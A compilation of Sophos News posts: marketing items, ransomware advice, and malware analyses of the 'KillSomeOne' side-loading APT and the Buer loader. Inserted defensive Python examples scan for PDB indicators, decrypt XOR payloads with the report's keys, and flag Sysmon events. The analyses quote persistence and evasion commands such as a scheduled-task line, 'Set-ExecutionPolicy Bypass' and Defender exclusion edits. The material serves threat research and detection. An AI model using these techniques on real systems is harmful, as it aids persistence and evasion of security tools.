Reducing security admin time by 50% – Sophos News

The customer is a leading provider of advanced software services, including web development, mobile app development, software testing, DevOps, digital marketing, and business intelligence.

With a head office in Costa Rica, their 920 staff are spread across Latin America: primarily Bolivia, Colombia, Costa Rica, and Peru. Within the IT team, five people have some responsibility for cybersecurity.

Cybersecurity: a company priority

The customer considers good cybersecurity as fundamental to their success. As their Chief Technology Officer (CTO) says:

“Who would want to do business with a company that is affected by a cyberattack or suffers a data breach?

While it’s very difficult to completely eliminate the possibility of a security event, it’s important that we can give our clients the guarantee that we are making every effort to prevent them, and that if an event does occur the impact will be minimal.”

Common challenges

Like many other organizations, the company faces challenges with cybersecurity resourcing: IT team members have multiple responsibilities, and no one is 100% dedicated to cybersecurity.

Another challenge is budget and justifying investments in cybersecurity, as the benefit is not very visible to other areas of the company.

With cyberattacks on the increase, the company is clear that putting in place security tools that automate most of the processes is essential for their success and will transform the company in general.

A cybersecurity evolution

The customer has been through a cybersecurity evolution: first they moved from a traditional firewall to a simple next-generation appliance, and then they moved to a full Sophos next-generation cybersecurity system.

They now use Sophos XG Firewall at the gateway, Sophos Intercept X endpoint protection, Sophos Email, Sophos Device Encryption, Sophos Wireless Access Points, and Sophos Phish Threat for user education.

The Sophos products share real-time threat, health, and security information, and work together to respond automatically to incidents. All protection is managed through the Sophos Central cloud-based management platform.

Transformation through automation

Prior to Sophos, there was no communication between their firewall and endpoint protection. As their CTO says:

“We have gained a lot from the ability of the Sophos products to work together, in particular their ability to automatically isolate compromised computers if an event is detected.

The ability to manage all the Sophos products through a single central platform is also crucial for us, along with the roadmap with further integrations.

Having tools that automatically detect and correct most security events enables our small IT team to manage the company’s security and prevent it being compromised.”

Fifty percent reduction in time spent on security admin

Switching to a Sophos next-gen cybersecurity system has cut the time the IT team spends on security admin by 50%.

Before Sophos, they spent over 20 hours a week. Now, thanks to the ability of the Sophos system to automatically respond to events, security admin takes less than 10 hours a week.

Rather than dealing with all the events themselves, the team now just reviews the alerts provided by the Sophos tools and analyzes how they are being addressed (remediation of events).

The team also greatly appreciates the ability to now manage all their cybersecurity in one place, thanks to the centralized management in Sophos’ cloud-based platform.

Security events are dealt with in seconds

While the company experiences security incidents every day – they get many malicious emails and regular attempts to breach their website – they have a very high level of containment.

In fact, their CTO says that the biggest impact of moving to the Sophos next-gen cybersecurity system is the speed with which security events are now dealt with, reducing their exposure to attacks.

Thanks to the integration between the Sophos firewall and Sophos endpoint protection, most of the events are dealt with in seconds by the system, with compromised devices automatically isolated.

The switch to the Sophos system has also enabled the team to get – for the first time – visibility of all security events, further elevating their ability to secure the organization against attackers.

Cybersecurity: a business enabler

The IT team is very aware of the role of cybersecurity in building trust with their customers and that good cyber defenses are a business differentiator.

As a result of the move to Sophos, their clients now have much greater confidence in their cybersecurity, facilitating business relationships.

See it in action

Watch this demo video to see just how easy day-to-day security management is with a Sophos system.

To try the system for yourself, the easiest way is to start a free trial of one of our products.

And for anything else, or to discuss your own challenges, the Sophos team is here to help.

Net Universe offers all Sophos devices and subscriptions as well as consulting services, with worldwide delivery.
Send us an email to [email protected] for more information or visit

Multi-firewall reporting comes to Sophos Central – Sophos News

The latest update to Sophos Central Firewall Reporting (CFR) Advanced adds reporting across multiple devices, enabling you to easily get a holistic view into network activity and threats across your entire estate.

Reporting is also more accessible in Sophos Central, with two new direct main menu options under Firewall Management for the Report Hub Dashboard and the Report Generator tools.

There’s also a new drop down box enabling you to select entire groups or individual firewalls to include in the dashboard view and reports.

New main menu items (left) provide direct access to the reporting tools, while a new drop-down selection (center) enables you to determine which firewalls to include in your various reports.

These features are included and automatically enabled at no extra charge for customers with a CFR Advanced subscription.

The new multi-firewall reporting enables easy visibility into the security posture across your entire network with just a few clicks. You can quickly and easily identify threat activity across all your devices, including Sandstorm suspicious file sandboxing events, AV, IPS, geo information, and much more.

Get a complete picture of threat activity across your entire network with just a few clicks.

How to get started

You can try CFR for free with limited storage and features for about seven days of data retention to see how it works and then contact your preferred Sophos Partner or Sophos directly to get going on CFR Advanced today.

Setup is easy: simply log into the firewall and select “Central Synchronization” from the main menu to add a firewall to Sophos Central. Then log into Sophos Central to confirm.

Switching from Sophos iView

Sophos iView is a legacy firewall reporting platform that is reaching end of life at the end of this year. Sophos Central Firewall Reporting provides a far more advanced and scalable reporting and analytics platform that replaces iView, enabling us to accelerate our roadmap and deliver more exciting new functionality sooner.

If you’re still using iView, now is the time to switch. It’s super easy. Get started sending your log data to Sophos Central today.

Additional resources


A new APT uses DLL side-loads to “KilllSomeOne” – Sophos News

Recently, we’ve observed several cases where DLL side-loading was used to execute malicious code. Side-loading is the use of a malicious DLL spoofing a legitimate one, relying on legitimate Windows executables to load and execute the malicious code.

While the technique is far from new—we first saw it used by (mostly Chinese) APT groups as early as 2013, before cybercrime groups started to add it to their arsenal—this particular payload was not one we’ve seen before. It stands out because the threat actors used several plaintext strings written in poor English with politically inspired messages in their samples.

The cases are connected by a common artifact: the program database (PDB) path. All samples share a similar PDB path, with several of them containing the folder name “KilllSomeOne.”

Based on the targeting of the attacks—against non-governmental organizations and other organizations in Myanmar—and other characteristics of the malware involved, we have reason to believe that the actors involved are a Chinese APT group.

Shell game

We have identified four different side-loading scenarios that were used by the same threat actor. Two of these delivered a payload carrying a simple shell, while the other two carried a more complex set of malware. Combinations from both of these sets were used in the same attacks.


Scenario 1

  • Aug.exe: clean loader (originally MsMpEng.exe, a Microsoft antivirus component)
  • mpsvc.dll: malicious loader
  • Groza_1.dat: encrypted payload

The main code of the attack is in mpsvc.dll’s exported function ServiceCrtMain. That function loads and decrypts the final payload, stored in the file Groza_1.dat.

The encryption is a simple XOR algorithm, where the key is the string “Hapenexx is very bad”.

While analyzing the binary for the loader used in this attack type, we found the following PDB path:

C:\Users\guss\Desktop\Recent Work\UU_P\KilllSomeOne.1\msvcp\Release\mpsvc.pdb

Scenario 2

  • AUG.exe: clean loader (renamed Microsoft DISM.EXE)
  • dismcore.dll: malicious loader
  • Groza_1.dat: encrypted payload

The loader has the following PDB path:

C:\Users\guss\Desktop\Recent Work\UU_P\KilllSomeOne.1\msvcp\Release\DismCore.pdb

The main code is in the exported function DllGetClassObject.

It uses the same payload name (Groza_1.dat) and password (Hapenexx is very bad) as the first case, only this time both the file name and the decryption key are themselves encrypted with a one-byte XOR algorithm.

In both of these cases, the payload is stored in the file named Groza_1.dat. The content of that file is PE loader shellcode, which decrypts the final payload, loads it into memory and executes it. The first layer of the loader code contains an unused string: AmericanUSA.

The final payload is a DLL file that has the PDB path:

C:\Users\guss\Desktop\Recent Work\UDP SHELL.7 DLL\UDPDLL\Release\UDPDLL.pdb

The DLL is a simple remote command shell, connecting back to a server with the IP address on port 9999. The code contains a string that is used to generate a key to decrypt the content of data received from the command and control server: “Happiness is a way station between too much and too little.”

More ways to KillSomeone

The other two observed types of KillSomeOne DLL side-loading deliver a fairly sophisticated installer for the simple shell—one that establishes persistence and does the housekeeping required to conceal the malware and prepare file space for collecting data. While they carry different payload files (adobe.dat in one case, and x32bridge.dat in the other), the executables derived from these two files are essentially the same; both have the PDB path:

C:\Users\guss\Desktop\Recent Work\UU_P\KilllSomeOne.1\Function_hex\hex\Release\hex.pdb
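As an added example (not code from the Sophos report), a small Python scanner that pulls PDB paths out of CodeView RSDS debug records and checks them against the folder names quoted in the paths above. The indicator list and the two sample blobs are constructed for this example; neither is a real file from the campaign.

```python
import struct

# Folder-name fragments from the PDB paths quoted in the report. Matching on
# fragments rather than a whole path survives the actor renaming a project.
# This indicator list is assembled for the example, not taken from a feed.
PDB_MARKERS = ("KilllSomeOne", "UDP SHELL", "\\guss\\")

RSDS_MAGIC = b"RSDS"
RSDS_HEADER_LEN = 4 + 16 + 4          # magic, GUID, age
MAX_PDB_PATH = 1024


def extract_pdb_paths(data):
    """Return the PDB path of every CodeView RSDS record found in `data`.

    An RSDS record is: 'RSDS' | 16-byte GUID | 4-byte age | NUL-terminated path.
    Scanning for the magic instead of walking the PE debug directory keeps this
    working on truncated files and unpacked memory dumps with damaged headers.
    """
    paths = []
    pos = data.find(RSDS_MAGIC)
    while pos != -1:
        start = pos + RSDS_HEADER_LEN
        end = data.find(b"\x00", start, start + MAX_PDB_PATH)
        if end != -1:
            try:
                path = data[start:end].decode("ascii")
            except UnicodeDecodeError:
                path = ""
            # A real record ends in .pdb; this filters stray 'RSDS' byte runs.
            if path.isprintable() and path.lower().endswith(".pdb"):
                paths.append(path)
        pos = data.find(RSDS_MAGIC, pos + len(RSDS_MAGIC))
    return paths


def match_markers(path):
    """Case-insensitive list of the indicators present in one PDB path."""
    low = path.lower()
    return [m for m in PDB_MARKERS if m.lower() in low]


def hunt(data):
    """Scan one file image; return (pdb_path, matched_markers) per record."""
    return [(p, match_markers(p)) for p in extract_pdb_paths(data)]


def build_rsds(pdb_path, guid=bytes(16), age=1):
    """Construct a synthetic RSDS record (test data only)."""
    return RSDS_MAGIC + guid + struct.pack("<I", age) + pdb_path.encode("ascii") + b"\x00"


# Constructed samples: one fake image carrying a path from the report, one
# carrying a benign build path followed by a stray 'RSDS' byte run.
SAMPLE_MALICIOUS = (
    b"MZ" + b"\x00" * 62
    + build_rsds("C:\\Users\\guss\\Desktop\\Recent Work\\UU_P\\KilllSomeOne.1\\msvcp\\Release\\mpsvc.pdb")
    + b"\xcc" * 32
)
SAMPLE_BENIGN = b"MZ" + b"\x00" * 30 + build_rsds("D:\\build\\release\\viewer.pdb") + b"RSDS garbage"

if __name__ == "__main__":
    for name, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        for path, hits in hunt(blob):
            verdict = "HIT " + ", ".join(hits) if hits else "no indicator"
            print(f"{name}: {path} -> {verdict}")
```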

Scenario 3

  • SafeGuard.exe: clean loader (Adobe component)
  • hex.dll: malicious loader
  • adobe.dat: encrypted payload

The malicious loader loads the payload from the file named adobe.dat, and uses a similar XOR decryption to that used in Scenario 1. The only significant difference is the encryption key, which in this case is the string HELLO_USA_PRISIDENT.

Scenario 4

  • Mediae.exe: clean loader
  • x32dbg.exe: clean loader
  • msvcp120.dll: clean DLL (dependency of x32dbg)
  • msvcr120.dll: clean DLL (dependency of x32dbg)
  • x32bridge.dll: malicious loader
  • x32bridge.dat: payload

In Scenario 4, the PDB path of the loader is changed to:


The main code is in the exported function BridgeInit.

The payload is stored in the file x32bridge.dat and is encoded with an XOR algorithm; the key is the same as in Scenario 3—HELLO_USA_PRISIDENT.
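An added example, not part of the original report: a Python triage helper for the XOR scheme used across Scenarios 1 to 4. It tries the two keys quoted above against a captured payload file and checks the result for the AmericanUSA marker, and it recovers the Scenario 2 one-byte XOR from the encrypted file name (which is known to end in .dat) before reusing it on the encrypted key. The sample ciphertexts and the 0x5A byte are constructed here; the report does not give the real byte.

```python
# Keys and first-layer marker string quoted in the report.
KNOWN_KEYS = (b"Hapenexx is very bad", b"HELLO_USA_PRISIDENT")
LAYER1_MARKERS = (b"AmericanUSA",)


def xor_bytes(data, key):
    """Repeating-key XOR; a one-byte key gives the single-byte variant."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def brute_force_single_byte(ct, suffix=b""):
    """Try all 256 one-byte keys; keep results that are printable ASCII and
    carry the expected suffix (e.g. b'.dat' for an encrypted payload name)."""
    hits = []
    for k in range(256):
        pt = xor_bytes(ct, bytes([k]))
        if all(0x20 <= c < 0x7F for c in pt) and pt.endswith(suffix):
            hits.append((k, pt))
    return hits


def triage_payload(ct, keys=KNOWN_KEYS, markers=LAYER1_MARKERS):
    """Decrypt with each known key; report the first result carrying a marker.
    Returns {'key', 'markers', 'plaintext'} or None when nothing matches."""
    for key in keys:
        pt = xor_bytes(ct, key)
        found = [m for m in markers if m in pt]
        if found:
            return {"key": key, "markers": found, "plaintext": pt}
    return None


def recover_scenario2_key(enc_name, enc_key):
    """Recover the one-byte XOR from the encrypted file name, then reuse it to
    decode the encrypted payload key. Returns (name, key) or None."""
    cands = brute_force_single_byte(enc_name, suffix=b".dat")
    if len(cands) != 1:
        return None
    k, name = cands[0]
    return name, xor_bytes(enc_key, bytes([k]))


# Constructed test data standing in for Groza_1.dat: a fake first-layer blob
# containing the report's unused string, encrypted with the Scenario 1 key.
FAKE_LAYER1 = b"\x90" * 8 + b"AmericanUSA\x00" + bytes(range(0x40, 0x80)) * 2
ENC_GROZA = xor_bytes(FAKE_LAYER1, KNOWN_KEYS[0])

# Constructed Scenario 2 strings; 0x5A is an arbitrary choice for the example.
SCENARIO2_BYTE = 0x5A
ENC_NAME = xor_bytes(b"Groza_1.dat", bytes([SCENARIO2_BYTE]))
ENC_KEY = xor_bytes(KNOWN_KEYS[0], bytes([SCENARIO2_BYTE]))

if __name__ == "__main__":
    name, key = recover_scenario2_key(ENC_NAME, ENC_KEY)
    print(f"Scenario 2 strings decode to {name!r} / {key!r}")
    result = triage_payload(ENC_GROZA, keys=(key,))
    print("payload key:", result["key"], "markers:", result["markers"])
```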

I think I smell a rat

The initial stage extracted from the two payload files in both of these scenarios is the installer, which is loaded into memory from the .dat file by the initial malicious DLL. When loaded, it drops all the components for the other DLL side-loading cases into several directories:

  • C:\ProgramData\UsersData\Windows_NT\Windows\User\Desktop
  • C:\Users\All Users\UsersData\Windows_NT\Windows\User\Desktop
  • %PROFILE%\Users
  • C:\Users\Public\Public Media

The installer also assigns the files the “hidden” and “system” attributes to conceal them from users.

Some of the components dropped by the KillSomeOne installer payload.

The installer then closes the executable used in the initial stage of the attack, and starts a new instance of explorer.exe to side-load the dropped DLL component. This is an effort to conceal the execution, since the targeted system’s process list will only show another explorer.exe process (and not the renamed clean executable, which might stand out upon examination).

The installer also looks for a running process with a name starting with “AAM,” then kills the process and deletes the file associated with it in C:\ProgramData and C:\Users\All Users. This is likely because earlier PlugX side-loading scenarios used the clean file name “AAM Updates.exe”, and this mechanism removes earlier infections. It also takes several steps to ensure persistence, including the creation of a task that executes the side-loading executable that began the deployment:

schtasks /create /sc minute /mo 5 /tn LKUFORYOU_1 /tr

Additionally, it creates a registry auto-run key that does the same thing:


The side-loaded DLL uses an event name to identify itself when running: LKU_Test_0.1 if running from C:\ProgramData, or LKU_Test_0.2 if running from %USERHOME%.

The installer also configures the system for data exfiltration. On removable and non-system drives, it creates a desktop.ini file with settings that give a folder the “Recycle Bin” type:


It then copies files to the Recycle Bin on the drive, in the subfolder ‘files’, and also collects system information, including volume names and free disk space. Lastly, it copies all the .dat files dropped—including those used in the other side-loading scenarios—into the installation directories. Then the installer loads akm.dat, the file containing the next payload—the loader.

The loader is a simple DLL file which, unlike the rest of the payloads, is not encrypted. It is a plain Windows PE file with a single export name, Start—the main function in the DLL, which builds a command line with the location of AUG.exe (the renamed Microsoft DISM.EXE):


Then it executes the command line, which invokes side-loading scenario 1 or 2.
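An added example that is not part of the report: Python detection rules run over constructed Sysmon-style process-creation (event 1) and image-load (event 7) records, covering the installer behaviour described above: the minute-interval LKUFORYOU task, explorer.exe started from outside the Windows directory as a side-load host, and the named loader DLLs loading from user-writable directories. The drop directory and the /tr target in the sample records are illustrative (the report's own /tr argument is not shown), and the user-writable roots should be tuned per environment.

```python
import re

# Names and paths taken from the report's description of the installer.
SIDELOAD_DLLS = {"mpsvc.dll", "dismcore.dll", "hex.dll", "x32bridge.dll"}
TASK_NAME_MARKER = "lkuforyou"
USER_WRITABLE_ROOTS = ("c:\\programdata\\", "c:\\users\\")   # tune per estate
WINDOWS_DIR = "c:\\windows\\"


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path):
    return path.lower().startswith(USER_WRITABLE_ROOTS)


def _arg(cmdline, switch):
    """Value following a schtasks switch such as /tn or /tr (quotes stripped)."""
    m = re.search(switch + r'\s+("[^"]*"|\S+)', cmdline, re.IGNORECASE)
    return m.group(1).strip('"') if m else ""


def check_process_create(ev):
    """Sysmon event 1 checks: the persistence task and the explorer.exe host."""
    reasons = []
    image = ev.get("Image", "")
    cl = ev.get("CommandLine", "")
    name = basename(image)
    if name == "schtasks.exe" and "/create" in cl.lower():
        task = _arg(cl, "/tn")
        target = _arg(cl, "/tr")
        if TASK_NAME_MARKER in task.lower():
            reasons.append(f"scheduled task name '{task}' matches KillSomeOne indicator")
        if re.search(r"/sc\s+minute", cl, re.IGNORECASE) and in_user_writable(target):
            reasons.append(f"minute-interval task runs '{target}' from a user-writable path")
    if name == "explorer.exe" and not image.lower().startswith(WINDOWS_DIR):
        reasons.append(f"explorer.exe started from '{image}', outside the Windows directory")
    return reasons


def check_image_load(ev):
    """Sysmon event 7 check: a known side-load DLL name loaded from a user-writable path."""
    loaded = ev.get("ImageLoaded", "")
    if basename(loaded) in SIDELOAD_DLLS and in_user_writable(loaded):
        return [f"known side-load DLL '{basename(loaded)}' loaded from '{loaded}'"]
    return []


def triage(events):
    """Return (index, reasons) for each event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            reasons = check_process_create(ev)
        elif ev.get("EventID") == 7:
            reasons = check_image_load(ev)
        else:
            reasons = []
        if reasons:
            out.append((i, reasons))
    return out


# Constructed Sysmon-style records modelled on the report (not real telemetry).
DROP = "C:\\ProgramData\\UsersData\\Windows_NT\\Windows\\User\\Desktop"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\explorer.exe",
     "CommandLine": "C:\\Windows\\Explorer.EXE"},                       # benign shell
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": f'schtasks /create /sc minute /mo 5 /tn LKUFORYOU_1 /tr "{DROP}\\SafeGuard.exe"'},
    {"EventID": 1, "Image": f"{DROP}\\explorer.exe", "CommandLine": f"{DROP}\\explorer.exe"},
    {"EventID": 7, "Image": f"{DROP}\\explorer.exe", "ImageLoaded": f"{DROP}\\hex.dll"},
    {"EventID": 7, "Image": "C:\\Tools\\x64dbg\\x32\\x32dbg.exe",
     "ImageLoaded": "C:\\Tools\\x64dbg\\x32\\x32bridge.dll"},           # legitimate debugger
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /sc daily /tn Backup /tr "C:\\Program Files\\Backup\\run.exe"'},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        for r in reasons:
            print(f"event {idx}: {r}")
```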


Mixed signals

The perpetrators behind targeted attacks are not a homogeneous pool. They come with very different skill sets and capabilities. Some are highly skilled, while others don’t have skills that exceed the level of the average cybercriminal.

The group responsible for the attacks we investigated in this report doesn’t clearly fall on either end of the spectrum. They moved to simpler implementations in coding—especially in encrypting the payload—and the messages hidden in their samples are on the level of script kiddies. On the other hand, the targeting and deployment are those of a serious APT group.

Based on our analysis, it’s not clear whether this group will go back to more traditional implants like PlugX or keep going with their own code. We will continue to monitor their activity to track their further evolution.

SophosLabs would like to acknowledge the contributions of Mark Loman and Vikas Singh to this report.



5 critical steps to take – Sophos News

The outbreak of COVID-19 has put cyberattacks on healthcare providers into hyperdrive. Factors contributing to such attacks include, but aren’t limited to:

  • Decentralized business operations
  • Emergency COVID-19 facilities set up without planned security of IT infrastructure
  • A significant rise in the amount of patient health data stored by healthcare organizations
  • Telehealth, and remote workers flung around the world almost overnight, opening up security gaps

Ryuk ransomware, in particular, has seen a resurgence recently. Sophos recently identified a new spam campaign linked to the Ryuk actors, and our Managed Threat Response team assisted an organization in mitigating a Ryuk attack, providing insight into how the Ryuk actors’ tools, techniques, and practices have evolved.

The investigation showed an evolution of the tools used to compromise targeted networks and deploy the ransomware. But what was more notable was how quickly the attacks can move from initial compromise to ransomware deployment. Within three and a half hours of a target opening a phishing email attachment, attackers were already conducting network reconnaissance. Within a day, they had gained access to a domain controller and were in the early stages of an attempt to deploy ransomware.

The evasion techniques of ransomware are rapidly changing. In recent years, ransomware attacks have trended away from brute-force, large-scale attacks to focused, planned, and manually executed attacks that are much harder to detect and block. Humans are handcrafting artisanal malware.

The criminals have hybridized their attacks, combining automation to find victims with gaps in their defenses. Exposed servers with Remote Desktop Protocol (RDP) enabled, administrators without multi-factor authentication for remote access, unpatched web servers, or even these same issues at a trusted partner or service provider are enough to put your network, systems, and resources under ransom.

Here are the five things healthcare providers can do to protect against ransomware attacks:

  1. Maintain IT hygiene. Make sure you’re practicing basic IT hygiene, which includes installing all the latest patches, shutting down RDP entirely (or putting it behind a VPN), and making regular back-ups and keeping them offsite where attackers can’t find them. It also includes applying multifactor authentication to services hosting the most sensitive data in your organization. These are just some of the fundamental steps you can take to protect yourself and your network today.
  2. Educate your users. Teach them about the importance of strong passwords and roll out two-factor authentication wherever you can. Educate them on phishing, which is one of the main delivery mechanisms for ransomware.
  3. Minimize the risk of lateral movement within your network. Segment LANs into smaller, isolated zones or VLANs that are secured and connected by the firewall. Be sure to apply suitable IPS policies to rules governing the traffic traversing these LAN segments in order to prevent exploits, worms, and bots from spreading between LAN segments. And if an infection hits, automatically isolate infected systems until they can be cleaned up.
  4. Use endpoint detection and response (EDR) tools with your endpoint protection. Targeted ransomware today isn’t just about stopping one piece of malware; it’s about stopping an active adversary and disrupting the attack chain that puts them in a position to run the malware. Ensure every endpoint is protected and up to date. A device not functioning correctly may not be protected and could be vulnerable to a ransomware attack. Use tools like EDR, which allow you to ask detailed questions so that you can hunt for active adversaries and identify advanced threats in your network. Once you do, EDR also helps you take appropriate actions quickly to stop such threats.
  5. Close the gap with human intervention. Computers, automation, and tools are amazing but human intellect, pattern recognition, and our ability to apply context provide an even more formidable defense. Managed detection and response (MDR) services are critical here. Pairing your internal IT and security teams with an external team of elite threat hunters and response experts helps provide actionable advice for addressing the root causes of recurring incidents.

Sophos Intercept X Advanced with EDR

Sophos Intercept X Advanced with EDR includes all the features you need to help protect your organization from ransomware attacks like Ryuk, Sodinokibi, Maze, and Ragnar Locker.

Intercept X includes anti-ransomware technology that detects malicious encryption processes and shuts them down before they can spread across your network. Anti-exploit technology stops the delivery and installation of ransomware, deep learning blocks ransomware before it can run, and CryptoGuard prevents the malicious encryption of files, rolling them back to their safe states.

Furthermore, Sophos EDR helps keep your threat hunting and IT operations hygiene running smoothly across your entire estate. Sophos EDR empowers your team to ask detailed questions to identify advanced threats, active adversaries, and potential IT vulnerabilities, and then quickly take appropriate action to stop them. It enables you to detect adversaries lurking in your network and waiting to deploy ransomware that may have gone unnoticed.

Sophos Managed Threat Response (MTR)

The Sophos MTR service adds human expertise to your layered security strategy. An elite team of threat hunters proactively looks for and validates potential threats on your behalf. If authorized, they take action to disrupt, contain, and neutralize threats, and provide actionable advice to address the root causes of recurring incidents.

Sophos Rapid Response

If your organization is under attack and needs immediate incident response assistance, Sophos can help.

Delivered by an expert team of incident responders, Sophos Rapid Response provides lightning-fast assistance with identification and neutralization of active threats against organizations. On-boarding starts within hours, and most customers are triaged within 48 hours. The service is available for both existing Sophos customers as well as non-Sophos customers.

The Sophos Rapid Response team of remote incident responders quickly takes action to triage, contain, and neutralize active threats. Adversaries are ejected from your estate to prevent further damage to your assets.

Related reading


Under attack? Sophos Rapid Response is here to help  – Sophos News

Experiencing an active cyberattack and defending against a potential breach can be an incredibly stressful time for an organization. However, many internal IT security teams lack the experience necessary to successfully respond to potential breaches, and getting immediate help from an outside resource can be next to impossible… until today.

We’re thrilled to announce the availability of Sophos Rapid Response, a new service which provides lightning-fast assistance with active threats, delivered by an expert team of incident responders.

The service, which has already helped dozens of organizations while in pilot mode, is available to both existing Sophos customers as well as non-Sophos customers.

Seconds matter

When under attack, time is of the essence. That’s why the Rapid Response service is built to be fast. How fast? Onboarding starts within hours, and most customers are triaged in 48 hours.

“I’ve seen firsthand how the Sophos Rapid Response team is able to cut through all of the noise to quickly remediate security incidents within hours, and the feedback from customers has been nothing but exceptional,” said Jeremy Weiss, cybersecurity practice lead at CDW.

The Rapid Response team are experts at quickly stopping advanced attacks, minimizing damage and costs, and reducing recovery time. Regardless of whether it’s a ransomware infection, network compromise, or unauthorized access attempting to circumvent security controls, they’ve seen it all and stopped it all.

A new type of incident response service

Rapid Response is an industry first, offering a fixed-fee remote incident response service that responds to active cybersecurity attacks throughout its entire 45-day term of engagement.

There are no hidden fees or escalating costs, and customers are protected for the full 45-day subscription term. Should the threat return or a related threat emerge, Rapid Response will respond at no additional cost.

Unlike traditional incident response (IR) services, which are priced hourly, you and the Rapid Response team have the same goal: to get your organization out of the danger as quickly as possible. And since the service is delivered remotely, response actions can be initiated on day one.

“A charitable organization providing housing and support services to thousands of vulnerable adults was hit by ransomware, taking down operations at all of its more than 40 facilities. The organization called us for help, and we immediately deployed Sophos Rapid Response. Working together with Sophos Rapid Response, we were able to get them back up and running quickly so they could continue serving those in need,” said Steve Weeks, president at Netcetera.

More information about Rapid Response can be found on our website.

Interested in ongoing managed detection and response? Sophos Managed Threat Response (MTR) provides ongoing 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.


inside the Buer Loader malware-as-a-service – Sophos News

During our investigation of a Ryuk attack in September 2020, we found the Ryuk actors had used a relatively new method for gaining initial access: a malware dropper called Buer. The September attack was part of a low-volume spear phishing attack tracked by Sophos. Over the next month, it evolved into a much larger spam campaign, carrying Buer as well as a number of other types of “loader” malware, as the Ryuk operators sought to ramp up their attacks.

First introduced in August of 2019, Buer is a malware-as-a-service offering that is used to deliver whatever package the service customer desires, providing initial compromise of targets’ Windows PCs and allowing them to establish a digital beachhead for further malicious activity. Buer has previously been tied to banking trojan attacks and other malware deployments—and now, apparently, has been embraced by ransomware operators. In many ways, Buer is positioned as an alternative to Emotet and Trickbot’s emerging Bazar loader (which both use similar behaviors to deploy).

Full-service bots

Buer was first advertised in a forum post on August 20, 2019 under the title “Modular Buer Loader”, described by its developers as “a new modular bot…written in pure C” with command and control (C&C) server code written in .NET Core MVC (which can be run on Linux servers). For $350 (plus whatever fee a third-party guarantor takes), a cybercriminal can buy a custom loader and access to the C&C panel from a single IP address—with a $25 charge to change that address. Buer’s developers limit users to two addresses per account.

The bot code, compiled for each user specific to a download, has an advertised size between 22 and 26 kilobytes—though the sample we looked at was about 40 kilobytes after being unpacked from its dropper. The bot can be configured for execution either as a 32-bit Windows executable or as a DLL.

The C&C can be used to track the number of successful downloads in a campaign, and to assign tasks to bots by filters such as the country they’re in, the “bitness of the operating system” (32 or 64 bit), the number of processors on the infected machine and the level of permissions obtained by the bot. Bots detected to be operating within the Commonwealth of Independent States will be shut down—which is a common behavior of malware developed in the ex-USSR region, as an attempt to avoid attention from local authorities.

The “file manager” in the command and control panel for the Buer loader bot. Files can be uploaded for distribution here—the maximum size is 28 megabytes.
The Buer panel tracks installations by operating system, CPU, “bitness” (32 or 64), activity, and which geographic region they’re in based on localization settings and other fingerprinting.

Tasks can be scheduled to run for a specific amount of time, or suspended upon command, with telemetry for the task sent back to the panel. The panel can also be used to deploy updates to bots, including (at least based on the advertisement) deployment of modules, with prebuilt modules to be added “over time” as part of the service. And of course, setup consulting and technical support are provided.

Prize inside every doc

Buer loader attack flow.

Sophos’ Rapid Response team discovered a sample of Buer at the root cause of a September Ryuk attack. The loader was delivered by a malicious document stored on Google Docs, which required the victim to enable scripted content to activate—a behavior similar to Emotet and other loader attacks via malicious spam emails but leveraging cloud storage to make forensic analysis more difficult.

We collected other messages from the same campaign in Sophos’ spam traps during the same period. The messages all used Google Docs files, and were sent using a popular commercial email distribution service—further obscuring the source and the link associated with the malicious document.

An example of the initial run of Buer bot distributing spear phishes.

The payload of that malicious document was named print_document.exe. Like other Buer dropper samples we’ve analyzed, it was a digitally signed binary, using a stolen and now-revoked certificate issued by DigiCert to “NEEDCODE SP Z O O,” a Polish software developer, issued on September 17, 2020. The dropper was built using modified code from a Microsoft sample application for image capture, AcquireTest, using the code’s function for “file enumeration” to delete and drop code.

The dropper does a number of things to ensure proper delivery. It first checks for the presence of a debugger to evade forensic analysis, and then checks language and localization settings to determine the geographic region of the system being attacked. If the settings match a CIS country, it will exit without depositing the malware. Otherwise, the dropper then dumps the Buer bot in memory and executes it.

Intriguingly, the Buer loader and Ryuk ransomware use the same shellcode loader to execute the unpacked malware code in memory.

This may not be an indication of shared authorship; the developers may have simply used the same sample code as their source.

Upon launch, the Buer bot does a number of things to set up shop. The bot executes two sets of PowerShell commands—one to bypass execution policies to allow PowerShell commands executed by the bot to go through without warnings (Set-ExecutionPolicy Bypass), and another (add-mppreference -exclusionpath) to make changes to Windows Defender’s exclusion list—concealing files it downloads from Windows’ built-in malware protection.

Buer queries the Windows Registry for the value of Microsoft\Cryptography\MachineGuid to get the unique identifier for the infected machine. And the bot calls home, interacting with the command and control server (in this case, 104[.]248.83.13) through a series of secure HTTP “POST” and “GET” messages.

Then there’s the “loader” part of what Buer does. The files packaged to be dropped by Buer are retrieved from a designated source and dropped in a folder created in the C:\ProgramData directory—the directory name is created programmatically and varies with deployments. In the September attack, Buer was used to deploy a Cobalt Strike beacon to the infected computer, which was then in turn used to exploit the network and launch a Ryuk attack.

Mixing it up

The malicious spam campaign that resulted in the Buer loader and Ryuk ransomware infections evolved at the end of September, as we observed the actors behind it shift the same tactics away from low volume on SendGrid to mail sent through Internet hosting providers—predominantly through a single Russian ISP. Then in October, the volume of spam rose dramatically—shifting away from Google Docs (as Google shut down the old files for terms of service violations) to another commercial email and file delivery service.

A somewhat less targeted spam message with a link to a malicious document stored by Constant Contact.

In the last two phases, while the tactics remained similar and other hallmarks suggested the spam actor was the same, multiple types of “dropper” malware were deployed as attachments. In addition to Buer, samples of Bazar and ZLoader were also found, with delivery payloads varying. For one Bazar loader payload, the attackers used a password-protected Excel spreadsheet. During the same timeframe, Bazar and ZLoader were also known to be involved in Ryuk attacks.

